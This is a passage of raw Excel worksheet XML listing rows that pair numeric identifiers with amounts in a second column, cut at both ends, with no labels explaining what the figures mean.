        <v>2610</v>
      </c>
      <c r="B844" s="8">
        <v>396500</v>
      </c>
    </row>
    <row r="845" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A845">
        <v>2611</v>
      </c>
      <c r="B845" s="8">
        <v>950000</v>
      </c>
    </row>
    <row r="846" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A846">
        <v>2613</v>
      </c>
      <c r="B846" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="847" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A847">
        <v>2615</v>
      </c>
      <c r="B847" s="8">
        <v>239000</v>
      </c>
    </row>
    <row r="848" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A848">
        <v>2616</v>
      </c>
      <c r="B848" s="8">
        <v>1400000</v>
      </c>
    </row>
    <row r="849" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A849">
        <v>2617</v>
      </c>
      <c r="B849" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="850" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A850">
        <v>2618</v>
      </c>
      <c r="B850" s="8">
        <v>105000</v>
      </c>
    </row>
    <row r="851" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A851">
        <v>2619</v>
      </c>
      <c r="B851" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="852" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A852">
        <v>2620</v>
      </c>
      <c r="B852" s="8">
        <v>950000</v>
      </c>
    </row>
    <row r="853" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A853">
        <v>2621</v>
      </c>
      <c r="B853" s="8">
        <v>312000</v>
      </c>
    </row>
    <row r="854" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A854">
        <v>2622</v>
      </c>
      <c r="B854" s="8">
        <v>15400</v>
      </c>
    </row>
    <row r="855" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A855">
        <v>2624</v>
      </c>
      <c r="B855" s="8">
        <v>6000</v>
      </c>
    </row>
    <row r="856" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A856">
        <v>2629</v>
      </c>
      <c r="B856" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="857" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A857">
        <v>2633</v>
      </c>
      <c r="B857" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="858" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A858">
        <v>2636</v>
      </c>
      <c r="B858" s="8">
        <v>4500</v>
      </c>
    </row>
    <row r="859" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A859">
        <v>2639</v>
      </c>
      <c r="B859" s="8">
        <v>3600</v>
      </c>
    </row>
    <row r="860" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A860">
        <v>2641</v>
      </c>
      <c r="B860" s="8">
        <v>55000</v>
      </c>
    </row>
    <row r="861" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A861">
        <v>2647</v>
      </c>
      <c r="B861" s="8">
        <v>6500</v>
      </c>
    </row>
    <row r="862" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A862">
        <v>2649</v>
      </c>
      <c r="B862" s="8">
        <v>280000</v>
      </c>
    </row>
    <row r="863" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A863">
        <v>2655</v>
      </c>
      <c r="B863" s="8">
        <v>33000</v>
      </c>
    </row>
    <row r="864" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A864">
        <v>2656</v>
      </c>
      <c r="B864" s="8">
        <v>420000</v>
      </c>
    </row>
    <row r="865" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A865">
        <v>2657</v>
      </c>
      <c r="B865" s="8">
        <v>542000</v>
      </c>
    </row>
    <row r="866" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A866">
        <v>2658</v>
      </c>
      <c r="B866" s="8">
        <v>145000</v>
      </c>
    </row>
    <row r="867" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A867">
        <v>2660</v>
      </c>
      <c r="B867" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="868" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A868">
        <v>2661</v>
      </c>
      <c r="B868" s="8">
        <v>390000</v>
      </c>
    </row>
    <row r="869" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A869">
        <v>2667</v>
      </c>
      <c r="B869" s="8">
        <v>3704000</v>
      </c>
    </row>
    <row r="870" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A870">
        <v>2669</v>
      </c>
      <c r="B870" s="8">
        <v>734145</v>
      </c>
    </row>
    <row r="871" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A871">
        <v>2671</v>
      </c>
      <c r="B871" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="872" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A872">
        <v>2674</v>
      </c>
      <c r="B872" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="873" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A873">
        <v>2675</v>
      </c>
      <c r="B873" s="8">
        <v>1140000</v>
      </c>
    </row>
    <row r="874" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A874">
        <v>2676</v>
      </c>
      <c r="B874" s="8">
        <v>13500</v>
      </c>
    </row>
    <row r="875" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A875">
        <v>2677</v>
      </c>
      <c r="B875" s="8">
        <v>150</v>
      </c>
    </row>
    <row r="876" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A876">
        <v>2685</v>
      </c>
      <c r="B876" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="877" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A877">
        <v>2686</v>
      </c>
      <c r="B877" s="8">
        <v>44000</v>
      </c>
    </row>
    <row r="878" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A878">
        <v>2687</v>
      </c>
      <c r="B878" s="8">
        <v>2950000</v>
      </c>
    </row>
    <row r="879" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A879">
        <v>2688</v>
      </c>
      <c r="B879" s="8">
        <v>2300</v>
      </c>
    </row>
    <row r="880" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A880">
        <v>2689</v>
      </c>
      <c r="B880" s="8">
        <v>168000</v>
      </c>
    </row>
    <row r="881" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A881">
        <v>2690</v>
      </c>
      <c r="B881" s="8">
        <v>151105</v>
      </c>
    </row>
    <row r="882" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A882">
        <v>2692</v>
      </c>
      <c r="B882" s="8">
        <v>124000</v>
      </c>
    </row>
    <row r="883" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A883">
        <v>2693</v>
      </c>
      <c r="B883" s="8">
        <v>516000</v>
      </c>
    </row>
    <row r="884" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A884">
        <v>2695</v>
      </c>
      <c r="B884" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="885" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A885">
        <v>2698</v>
      </c>
      <c r="B885" s="8">
        <v>6000</v>
      </c>
    </row>
    <row r="886" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A886">
        <v>2700</v>
      </c>
      <c r="B886" s="8">
        <v>24000</v>
      </c>
    </row>
    <row r="887" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A887">
        <v>2701</v>
      </c>
      <c r="B887" s="8">
        <v>12000000</v>
      </c>
    </row>
    <row r="888" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A888">
        <v>2703</v>
      </c>
      <c r="B888" s="8">
        <v>216000</v>
      </c>
    </row>
    <row r="889" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A889">
        <v>2704</v>
      </c>
      <c r="B889" s="8">
        <v>2400000</v>
      </c>
    </row>
    <row r="890" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A890">
        <v>2705</v>
      </c>
      <c r="B890" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="891" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A891">
        <v>2710</v>
      </c>
      <c r="B891" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="892" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A892">
        <v>2711</v>
      </c>
      <c r="B892" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="893" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A893">
        <v>2715</v>
      </c>
      <c r="B893" s="8">
        <v>400</v>
      </c>
    </row>
    <row r="894" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A894">
        <v>2718</v>
      </c>
      <c r="B894" s="8">
        <v>703000</v>
      </c>
    </row>
    <row r="895" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A895">
        <v>2719</v>
      </c>
      <c r="B895" s="8">
        <v>2444829</v>
      </c>
    </row>
    <row r="896" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A896">
        <v>2724</v>
      </c>
      <c r="B896" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="897" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A897">
        <v>2731</v>
      </c>
      <c r="B897" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="898" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A898">
        <v>2732</v>
      </c>
      <c r="B898" s="8">
        <v>219001</v>
      </c>
    </row>
    <row r="899" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A899">
        <v>2733</v>
      </c>
      <c r="B899" s="8">
        <v>139250</v>
      </c>
    </row>
    <row r="900" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A900">
        <v>2734</v>
      </c>
      <c r="B900" s="8">
        <v>3301400</v>
      </c>
    </row>
    <row r="901" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A901">
        <v>2735</v>
      </c>
      <c r="B901" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="902" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A902">
        <v>2738</v>
      </c>
      <c r="B902" s="8">
        <v>4500</v>
      </c>
    </row>
    <row r="903" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A903">
        <v>2742</v>
      </c>
      <c r="B903" s="8">
        <v>142843.5</v>
      </c>
    </row>
    <row r="904" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A904">
        <v>2746</v>
      </c>
      <c r="B904" s="8">
        <v>36000</v>
      </c>
    </row>
    <row r="905" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A905">
        <v>2747</v>
      </c>
      <c r="B905" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="906" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A906">
        <v>2750</v>
      </c>
      <c r="B906" s="8">
        <v>240000</v>
      </c>
    </row>
    <row r="907" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A907">
        <v>2755</v>
      </c>
      <c r="B907" s="8">
        <v>2105000</v>
      </c>
    </row>
    <row r="908" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A908">
        <v>2759</v>
      </c>
      <c r="B908" s="8">
        <v>684000</v>
      </c>
    </row>
    <row r="909" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A909">
        <v>2760</v>
      </c>
      <c r="B909" s="8">
        <v>90000</v>
      </c>
    </row>
    <row r="910" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A910">
        <v>2761</v>
      </c>
      <c r="B910" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="911" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A911">
        <v>2763</v>
      </c>
      <c r="B911" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="912" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A912">
        <v>2769</v>
      </c>
      <c r="B912" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="913" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A913">
        <v>2772</v>
      </c>
      <c r="B913" s="8">
        <v>1900000</v>
      </c>
    </row>
    <row r="914" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A914">
        <v>2774</v>
      </c>
      <c r="B914" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="915" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A915">
        <v>2776</v>
      </c>
      <c r="B915" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="916" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A916">
        <v>2777</v>
      </c>
      <c r="B916" s="8">
        <v>517000</v>
      </c>
    </row>
    <row r="917" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A917">
        <v>2778</v>
      </c>
      <c r="B917" s="8">
        <v>160000</v>
      </c>
    </row>
    <row r="918" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A918">
        <v>2779</v>
      </c>
      <c r="B918" s="8">
        <v>112000</v>
      </c>
    </row>
    <row r="919" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A919">
        <v>2781</v>
      </c>
      <c r="B919" s="8">
        <v>2000000</v>
      </c>
    </row>
    <row r="920" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A920">
        <v>2784</v>
      </c>
      <c r="B920" s="8">
        <v>106000</v>
      </c>
    </row>
    <row r="921" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A921">
        <v>2785</v>
      </c>
      <c r="B921" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="922" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A922">
        <v>2791</v>
      </c>
      <c r="B922" s="8">
        <v>850</v>
      </c>
    </row>
    <row r="923" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A923">
        <v>2792</v>
      </c>
      <c r="B923" s="8">
        <v>1080000</v>
      </c>
    </row>
    <row r="924" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A924">
        <v>2795</v>
      </c>
      <c r="B924" s="8">
        <v>1800000</v>
      </c>
    </row>
    <row r="925" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A925">
        <v>2798</v>
      </c>
      <c r="B925" s="8">
        <v>500</v>
      </c>
    </row>
    <row r="926" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A926">
        <v>2802</v>
      </c>
      <c r="B926" s="8">
        <v>5040</v>
      </c>
    </row>
    <row r="927" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A927">
        <v>2810</v>
      </c>
      <c r="B927" s="8">
        <v>264000</v>
      </c>
    </row>
    <row r="928" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A928">
        <v>2813</v>
      </c>
      <c r="B928" s="8">
        <v>7600000</v>
      </c>
    </row>
    <row r="929" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A929">
        <v>2814</v>
      </c>
      <c r="B929" s="8">
        <v>640000</v>
      </c>
    </row>
    <row r="930" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A930">
        <v>2817</v>
      </c>
      <c r="B930" s="8">
        <v>936000</v>
      </c>
    </row>
    <row r="931" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A931">
        <v>2818</v>
      </c>
      <c r="B931" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="932" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A932">
        <v>2820</v>
      </c>
      <c r="B932" s="8">
        <v>320000</v>
      </c>
    </row>
    <row r="933" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A933">
        <v>2821</v>
      </c>
      <c r="B933" s="8">
        <v>68000</v>
      </c>
    </row>
    <row r="934" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A934">
        <v>2822</v>
      </c>
      <c r="B934" s="8">
        <v>720000</v>
      </c>
    </row>
    <row r="935" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A935">
        <v>2826</v>
      </c>
      <c r="B935" s="8">
        <v>1460000</v>
      </c>
    </row>
    <row r="936" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A936">
        <v>2827</v>
      </c>
      <c r="B936" s="8">
        <v>370000</v>
      </c>
    </row>
    <row r="937" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A937">
        <v>2835</v>
      </c>
      <c r="B937" s="8">
        <v>115000</v>
      </c>
    </row>
    <row r="938" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A938">
        <v>2837</v>
      </c>
      <c r="B938" s="8">
        <v>96000</v>
      </c>
    </row>
    <row r="939" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A939">
        <v>2839</v>
      </c>
      <c r="B939" s="8">
        <v>360</v>
      </c>
    </row>
    <row r="940" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A940">
        <v>2844</v>
      </c>
      <c r="B940" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="941" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A941">
        <v>2853</v>
      </c>
      <c r="B941" s="8">
        <v>880000</v>
      </c>
    </row>
    <row r="942" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A942">
        <v>2856</v>
      </c>
      <c r="B942" s="8">
        <v>5234636</v>
      </c>
    </row>
    <row r="943" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A943">
        <v>2857</v>
      </c>
      <c r="B943" s="8">
        <v>5175990</v>
      </c>
    </row>
    <row r="944" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A944">
        <v>2861</v>
      </c>
      <c r="B944" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="945" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A945">
        <v>2862</v>
      </c>
      <c r="B945" s="8">
        <v>276</v>
      </c>
    </row>
    <row r="946" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A946">
        <v>4422</v>
      </c>
      <c r="B946" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="947" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A947">
        <v>4571</v>
      </c>
      <c r="B947" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="948" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A948">
        <v>4759</v>
      </c>
      <c r="B948" s="8">
        <v>5827300</v>
      </c>
    </row>
    <row r="949" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A949">
        <v>4761</v>
      </c>
      <c r="B949" s="8">
        <v>20500</v>
      </c>
    </row>
    <row r="950" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A950">
        <v>4771</v>
      </c>
      <c r="B950" s="8">
        <v>1320000</v>
      </c>
    </row>
    <row r="951" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A951">
        <v>4773</v>
      </c>
      <c r="B951" s="8">
        <v>480000</v>
      </c>
    </row>
    <row r="952" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A952">
        <v>4774</v>
      </c>
      <c r="B952" s="8">
        <v>1763000</v>
      </c>
    </row>
    <row r="953" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A953">
        <v>4775</v>
      </c>
      <c r="B953" s="8">
        <v>3700000</v>
      </c>
    </row>
    <row r="954" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A954">
        <v>4776</v>
      </c>
      <c r="B954" s="8">
        <v>35900.950000000004</v>
      </c>
    </row>
    <row r="955" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A955">
        <v>4778</v>
      </c>
      <c r="B955" s="8">
        <v>16000</v>
      </c>
    </row>
    <row r="956" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A956">
        <v>4779</v>
      </c>
      <c r="B956" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="957" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A957">
        <v>4780</v>
      </c>
      <c r="B957" s="8">
        <v>2280</v>
      </c>
    </row>
    <row r="958" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A958">
        <v>4782</v>
      </c>
      <c r="B958" s="8">
        <v>24000</v>
      </c>
    </row>
    <row r="959" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A959">
        <v>4783</v>
      </c>
      <c r="B959" s="8">
        <v>500</v>
      </c>
    </row>
    <row r="960" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A960">
        <v>4784</v>
      </c>
      <c r="B960" s="8">
        <v>1200</v>
      </c>
    </row>
    <row r="961" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A961">
        <v>4787</v>
      </c>
      <c r="B961" s="8">
        <v>1120000</v>
      </c>
    </row>
    <row r="962" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A962">
        <v>4788</v>
      </c>
      <c r="B962" s="8">
        <v>250</v>
      </c>
    </row>
    <row r="963" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A963">
        <v>4789</v>
      </c>
      <c r="B963" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="964" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A964">
        <v>4790</v>
      </c>
      <c r="B964" s="8">
        <v>1606600</v>
      </c>
    </row>
    <row r="965" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A965">
        <v>4796</v>
      </c>
      <c r="B965" s="8">
        <v>157500</v>
      </c>
    </row>
    <row r="966" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A966">
        <v>4798</v>
      </c>
      <c r="B966" s="8">
        <v>1656000</v>
      </c>
    </row>
    <row r="967" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A967">
        <v>4799</v>
      </c>
      <c r="B967" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="968" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A968">
        <v>4801</v>
      </c>
      <c r="B968" s="8">
        <v>846000</v>
      </c>
    </row>
    <row r="969" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A969">
        <v>4803</v>
      </c>
      <c r="B969" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="970" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A970">
        <v>4804</v>
      </c>
      <c r="B970" s="8">
        <v>160000</v>
      </c>
    </row>
    <row r="971" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A971">
        <v>4805</v>
      </c>
      <c r="B971" s="8">
        <v>7704</v>
      </c>
    </row>
    <row r="972" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A972">
        <v>4806</v>
      </c>
      <c r="B972" s="8">
        <v>3000000</v>
      </c>
    </row>
    <row r="973" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A973">
        <v>4809</v>
      </c>
      <c r="B973" s="8">
        <v>161000</v>
      </c>
    </row>
    <row r="974" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A974">
        <v>4810</v>
      </c>
      <c r="B974" s="8">
        <v>1600000</v>
      </c>
    </row>
    <row r="975" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A975">
        <v>4811</v>
      </c>
      <c r="B975" s="8">
        <v>1700000</v>
      </c>
    </row>
    <row r="976" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A976">
        <v>4813</v>
      </c>
      <c r="B976" s="8">
        <v>2000000</v>
      </c>
    </row>
    <row r="977" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A977">
        <v>4817</v>
      </c>
      <c r="B977" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="978" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A978">
        <v>4819</v>
      </c>
      <c r="B978" s="8">
        <v>710000</v>
      </c>
    </row>
    <row r="979" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A979">
        <v>4820</v>
      </c>
      <c r="B979" s="8">
        <v>115000</v>
      </c>
    </row>
    <row r="980" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A980">
        <v>4821</v>
      </c>
      <c r="B980" s="8">
        <v>160000</v>
      </c>
    </row>
    <row r="981" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A981">
        <v>4824</v>
      </c>
      <c r="B981" s="8">
        <v>240000</v>
      </c>
    </row>
    <row r="982" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A982">
        <v>4826</v>
      </c>
      <c r="B982" s="8">
        <v>2000000</v>
      </c>
    </row>
    <row r="983" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A983">
        <v>4827</v>
      </c>
      <c r="B983" s="8">
        <v>600</v>
      </c>
    </row>
    <row r="984" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A984">
        <v>4828</v>
      </c>
      <c r="B984" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="985" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A985">
        <v>4830</v>
      </c>
      <c r="B985" s="8">
        <v>12000</v>
      </c>
    </row>
    <row r="986" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A986">
        <v>4831</v>
      </c>
      <c r="B986" s="8">
        <v>2200</v>
      </c>
    </row>
    <row r="987" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A987">
        <v>4832</v>
      </c>
      <c r="B987" s="8">
        <v>1514880</v>
      </c>
    </row>
    <row r="988" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A988">
        <v>4834</v>
      </c>
      <c r="B988" s="8">
        <v>2500000</v>
      </c>
    </row>
    <row r="989" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A989">
        <v>4837</v>
      </c>
      <c r="B989" s="8">
        <v>10200</v>
      </c>
    </row>
    <row r="990" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A990">
        <v>4839</v>
      </c>
      <c r="B990" s="8">
        <v>215307.32166666668</v>
      </c>
    </row>
    <row r="991" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A991">
        <v>4840</v>
      </c>
      <c r="B991" s="8">
        <v>8500</v>
      </c>
    </row>
    <row r="992" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A992">
        <v>4846</v>
      </c>
      <c r="B992" s="8">
        <v>33000000</v>
      </c>
    </row>
    <row r="993" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A993">
        <v>4853</v>
      </c>
      <c r="B993" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="994" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A994">
        <v>4858</v>
      </c>
      <c r="B994" s="8">
        <v>24000000</v>
      </c>
    </row>
    <row r="995" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A995">
        <v>4860</v>
      </c>
      <c r="B995" s="8">
        <v>48000</v>
      </c>
    </row>
    <row r="996" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A996">
        <v>4862</v>
      </c>
      <c r="B996" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="997" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A997">
        <v>4863</v>
      </c>
      <c r="B997" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="998" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A998">
        <v>4866</v>
      </c>
      <c r="B998" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="999" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A999">
        <v>4871</v>
      </c>
      <c r="B999" s="8">
        <v>2616000</v>
      </c>
    </row>
    <row r="1000" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1000">
        <v>4876</v>
      </c>
      <c r="B1000" s="8">
        <v>315</v>
      </c>
    </row>
    <row r="1001" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1001">
        <v>4878</v>
      </c>
      <c r="B1001" s="8">
        <v>3031000</v>
      </c>
    </row>
    <row r="1002" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1002">
        <v>4879</v>
      </c>
      <c r="B1002" s="8">
        <v>1700000</v>
      </c>
    </row>
    <row r="1003" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1003">
        <v>4880</v>
      </c>
      <c r="B1003" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="1004" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1004">
        <v>4882</v>
      </c>
      <c r="B1004" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="1005" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1005">
        <v>4885</v>
      </c>
      <c r="B1005" s="8">
        <v>90000</v>
      </c>
    </row>
    <row r="1006" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1006">
        <v>4887</v>
      </c>
      <c r="B1006" s="8">
        <v>471810</v>
      </c>
    </row>
    <row r="1007" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1007">
        <v>4888</v>
      </c>
      <c r="B1007" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="1008" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1008">
        <v>4889</v>
      </c>
      <c r="B1008" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="1009" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1009">
        <v>4898</v>
      </c>
      <c r="B1009" s="8">
        <v>1300000</v>
      </c>
    </row>
    <row r="1010" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1010">
        <v>4901</v>
      </c>
      <c r="B1010" s="8">
        <v>640000</v>
      </c>
    </row>
    <row r="1011" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1011">
        <v>4902</v>
      </c>
      <c r="B1011" s="8">
        <v>528</v>
      </c>
    </row>
    <row r="1012" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1012">
        <v>4904</v>
      </c>
      <c r="B1012" s="8">
        <v>250000</v>
      </c>
    </row>
    <row r="1013" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1013">
        <v>4906</v>
      </c>
      <c r="B1013" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="1014" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1014">
        <v>4908</v>
      </c>
      <c r="B1014" s="8">
        <v>964800</v>
      </c>
    </row>
    <row r="1015" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1015">
        <v>4909</v>
      </c>
      <c r="B1015" s="8">
